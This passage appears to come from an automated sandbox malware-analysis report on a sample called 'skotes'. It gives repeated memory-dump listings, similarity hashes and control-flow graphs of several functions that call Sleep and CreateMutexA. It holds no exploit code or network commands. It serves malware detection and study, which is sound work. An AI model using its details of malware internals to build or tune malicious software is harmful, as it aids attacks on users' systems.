                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 90761d2db65d46d898a096eb923a593e50ac1e1cfeb7ef2cc222fa50040e10b3
                                                                                                                                              • Instruction ID: d87d1cd4535982e580c995ec10167df4a758edc48df59e7b39c9ec3e9ccef524
                                                                                                                                              • Opcode Fuzzy Hash: 90761d2db65d46d898a096eb923a593e50ac1e1cfeb7ef2cc222fa50040e10b3
                                                                                                                                              • Instruction Fuzzy Hash: 9E3129717002009BEB18DB78DD89BADB761EBC6314F24863EE054A73D1C77D8991875A
                                                                                                                                              Function 0040A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 202 40a682-40a6a2 206 40a6d0-40a6ec 202->206 207 40a6a4-40a6b0 202->207 210 40a71a-40a739 206->210 211 40a6ee-40a6fa 206->211 208 40a6b2-40a6c0 207->208 209 40a6c6-40a6cd call 41d663 207->209 208->209 212 40a949 208->212 209->206 216 40a767-40a916 call 4180c0 210->216 217 40a73b-40a747 210->217 214 40a710-40a717 call 41d663 211->214 215 40a6fc-40a70a 211->215 220 40a94e-40a994 call 436c6a Sleep CreateMutexA 212->220 221 40a949 call 436c6a 212->221 214->210 215->212 215->214 223 40a749-40a757 217->223 224 40a75d-40a764 call 41d663 217->224 234 40a996-40a998 220->234 235 40a9a7-40a9a8 220->235 221->220 223->212 223->224 224->216 234->235 236 40a99a-40a9a5 234->236 236->235
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: a6ea2f7246cb63bb3ba03756c45b6dc858977f61678756bade2f052fac116b5d
                                                                                                                                              • Instruction ID: 402f7597f10c2c85c385bf451a204f21aec01570a39f3eb915b28904fe70b45e
                                                                                                                                              • Opcode Fuzzy Hash: a6ea2f7246cb63bb3ba03756c45b6dc858977f61678756bade2f052fac116b5d
                                                                                                                                              • Instruction Fuzzy Hash: A4312571B002009BEB18DB78CD89BAEB772DB86314F24863EE054A73D1C77D8990875A
                                                                                                                                              Function 00409ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 238 409adc-409ae8 239 409aea-409af8 238->239 240 409afe-409d91 call 41d663 call 417a00 call 405c10 call 408b30 call 418220 call 417a00 call 405c10 call 408b30 call 418220 238->240 239->240 241 40a917 239->241 244 40a953-40a994 Sleep CreateMutexA 241->244 245 40a917 call 436c6a 241->245 249 40a996-40a998 244->249 250 40a9a7-40a9a8 244->250 245->244 249->250 252 40a99a-40a9a5 249->252 252->250
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: d8cf7d6589cc4423550e11dad017799740c3aae992c341a475274cce026c17d7
                                                                                                                                              • Instruction ID: 72c25ccc3c98b687f461c8a5614e9890d65ff7dd98d12d5d12a57dfed5dd64b6
                                                                                                                                              • Opcode Fuzzy Hash: d8cf7d6589cc4423550e11dad017799740c3aae992c341a475274cce026c17d7
                                                                                                                                              • Instruction Fuzzy Hash: 462137717042409BEB289F68DC89B6DB771EBC2310F20463FE408A73D1DB7D9991875A
                                                                                                                                              Function 0040A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 306 40a856-40a86e 307 40a870-40a87c 306->307 308 40a89c-40a89e 306->308 309 40a892-40a899 call 41d663 307->309 310 40a87e-40a88c 307->310 311 40a8a0-40a8a7 308->311 312 40a8a9-40a8b1 call 407d30 308->312 309->308 310->309 313 40a94e-40a987 call 436c6a Sleep CreateMutexA 310->313 315 40a8eb-40a916 call 4180c0 311->315 322 40a8b3-40a8bb call 407d30 312->322 323 40a8e4-40a8e6 312->323 326 40a98e-40a994 313->326 322->323 330 40a8bd-40a8c5 call 407d30 322->330 323->315 328 40a996-40a998 326->328 329 40a9a7-40a9a8 326->329 328->329 332 40a99a-40a9a5 328->332 330->323 334 40a8c7-40a8cf call 407d30 330->334 332->329 334->323 338 40a8d1-40a8d9 call 407d30 334->338 338->323 341 40a8db-40a8e2 338->341 341->315
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 16e874b86d294c8dbc95263be5d20036760f62e1634f1376cb63d85bd758e359
                                                                                                                                              • Instruction ID: 65f7a11f8f5d9a7888932b6c96b400ff01250f41755c5f46970d0e4d3ddc698f
                                                                                                                                              • Opcode Fuzzy Hash: 16e874b86d294c8dbc95263be5d20036760f62e1634f1376cb63d85bd758e359
                                                                                                                                              • Instruction Fuzzy Hash: 1221607274430096FB24B769885A76E7261DF82300F34483FE544F63D1CB7D5891429F
                                                                                                                                              Function 0040A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 283 40a34f-40a35b 284 40a371-40a39a call 41d663 283->284 285 40a35d-40a36b 283->285 291 40a3c8-40a916 call 4180c0 284->291 292 40a39c-40a3a8 284->292 285->284 286 40a93a 285->286 289 40a953-40a994 Sleep CreateMutexA 286->289 290 40a93a call 436c6a 286->290 297 40a996-40a998 289->297 298 40a9a7-40a9a8 289->298 290->289 294 40a3aa-40a3b8 292->294 295 40a3be-40a3c5 call 41d663 292->295 294->286 294->295 295->291 297->298 301 40a99a-40a9a5 297->301 301->298
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
